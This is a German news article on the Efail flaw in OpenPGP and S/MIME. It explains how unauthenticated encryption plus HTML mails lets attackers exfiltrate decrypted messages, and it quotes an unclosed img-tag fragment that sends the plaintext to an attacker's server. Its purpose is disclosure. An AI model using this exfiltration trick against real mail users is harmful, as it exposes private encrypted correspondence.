Abo
  • IT-Karriere:

PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen

Ein Zusammenspiel von veralteten Verschlüsselungsmethoden und HTML-Mails erlaubt es in vielen Fällen, mit OpenPGP oder S/MIME verschlüsselte Nachrichten zu exfiltrieren. Bislang gibt es keine echten Fixes und nur unzureichende Workarounds.

Artikel von Hanno Böck veröffentlicht am
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter.
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter. (Bild: Jana Runde/Zuzana Somorovska)

Ein Forscherteam hat eine ganze Reihe von Problemen bei der Verwendung verschlüsselter E-Mails entdeckt. Die Efail getaufte Lücke betrifft beide standardisierten E-Mail-Verschlüsselungsverfahren - OpenPGP und S/MIME - und lässt sich in zahlreichen E-Mail-Clients ausnutzen.

Inhalt:
  1. PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen
  2. Verschlüsselung nicht authentifiziert
  3. Workarounds, Updates, Gegenmaßnahmen

Das Grundproblem: Verschlüsselung ohne Authentifizierung. S/MIME nutzt einen völlig unauthentifizierten Verschlüsselungsmodus, in OpenPGP ist zwar theoretisch eine Authentifizierung vorgesehen, die ist aber in der Praxis oft nutzlos.

Die Angriffe nutzen HTML-Mails, um entschlüsselte Daten an den Server des Angreifers zu schicken. Dabei wird eine bestehende E-Mail so umgestaltet, dass der HTML-Code eine Anfrage zu einem Server auslöst und dabei den entschlüsselten Text der Mail mitschickt.

Angriff über Multipart-Mails

Bereits daraus lässt sich in manchen Fällen ein Angriff konstruieren. E-Mail-Nachrichten können aus mehreren Teilen bestehen, sogenannte Multipart-Messages. In manchen Mailclients - am einfachsten in Apple Mail - ist es möglich, direkt aus dem HTML-Teil einer Nachricht auf den nachfolgenden Textteil zuzugreifen.

Stellenmarkt
  1. awinta GmbH, Region Süd-West
  2. Fraunhofer-Institut für Produktionstechnik und Automatisierung IPA, Stuttgart

Ein Angreifer kann nun Folgendes machen: Er schickt als ersten Teil einer Nachricht einen HTML-Teil, der beispielsweise ein Bild lädt, aber den HTML-Tag nicht schließt. Also etwa <img src="http://efail.de/. Als zweiten Teil hängt er den verschlüsselten Teil einer Mail an, die er mitgelesen hat, etwa über einen Man-in-the-Middle-Angriff zwischen den Mailservern. Im Mailclient des Opfers passiert nun Folgendes: Ein Bild wird vom Server des Angreifers geladen und als Pfad wird der Inhalt des nachfolgenden Textteils codiert angehängt.

In Apple Mail funktioniert dieser Angriff direkt, in Mozilla Thunderbird werden in der Standardeinstellung keine Bilder geladen. Doch auch hier ist es mit Tricks möglich, eine Exfiltration der Daten zu erreichen. So kann man beispielsweise per HTML ein Formular erzeugen, das die Daten des verschlüsselten Teils an den Angreifer schickt. Da man die Mail über CSS beliebig layouten kann, kann man das auch so machen, dass ein Klick irgendwo in der Mail dazu führt, dass das Formular abgeschickt wird.

Verschlüsselung nicht authentifiziert 
  1. 1
  2. 2
  3. 3
  4.  


Anzeige
Hardware-Angebote
  1. 449€

mark.wolf 22. Mai 2018

Du solltest Dich mal ein klein wenig mit dem Recht auseinandersetzen. Auch dein...

Auspuffanlage 21. Mai 2018

Hi ich interpretiere das mal so, dass du wissen willst wo es diese Informationen gibt...

joo 17. Mai 2018

-------------------------------------------------------------------------------- +1...

phade 15. Mai 2018

Zumeist Mail von der Seamonkey-Suite (ergo Thunderbird). Nur nutzt das nix, wenn das für...

Mr Miyagi 15. Mai 2018

Natürlich *kann* es das. GnuPG könnte auch ein Abbild Deiner ganzen Mailbox im Speicehr...


Folgen Sie uns
       


Motorola One Vision - Hands on

Das zweite Android-One-Smartphone von Motorola heißt One Vision. Es hat eine 48-Megapixel-Kamera von Samsung, die vor allem auf gute Aufnahmen bei schwachem Licht optimiert wurde. Das Smartphone mit dem 7:3-Display kommt Ende Mai 2019 für 300 Euro auf den Markt.

Motorola One Vision - Hands on Video aufrufen
Watch Dogs Legion angespielt: Eine Seniorin als Ein-Frau-Armee
Watch Dogs Legion angespielt
Eine Seniorin als Ein-Frau-Armee

E3 2019 Elitesoldaten brauchen wir nicht - in Watch Dogs Legion hacken und schießen wir auch als Pensionistin für den Widerstand. Beim Anspielen haben wir sehr über die ebenso klapprige wie kampflustige Oma Gwendoline gelacht.


    5G-Auktion: Warum der Preis der 5G-Frequenzen so hoch war
    5G-Auktion
    Warum der Preis der 5G-Frequenzen so hoch war

    Dass die Frequenzen für den 5G-Mobilfunk teuer wurden, lasten Telekom, Vodafone und Telefónica dem Newcomer United Internet an. Doch dies ist laut dem Netzplaner Kai Seim nicht so gewesen.
    Eine Analyse von Achim Sawall

    1. Funklöcher Hohe Bußgelder gegen säumige Mobilfunknetzbetreiber
    2. Bundesnetzagentur 5G-Frequenzauktion erreicht 6,5 Milliarden Euro
    3. 5G-Auktion Etablierte wollen Preis für 1&1 Drillisch hochtreiben

    Wolfenstein Youngblood angespielt: Warum wurden diese dämlichen Mädchen nicht aufgehalten!?
    Wolfenstein Youngblood angespielt
    "Warum wurden diese dämlichen Mädchen nicht aufgehalten!?"

    E3 2019 Der erste Kill ist der schwerste: In Wolfenstein Youngblood kämpfen die beiden Töchter von B.J. Blazkowicz gegen Nazis. Golem.de hat sich mit Jess und Soph durch einen Zeppelin über dem belagerten Paris gekämpft.
    Von Peter Steinlechner


        •  /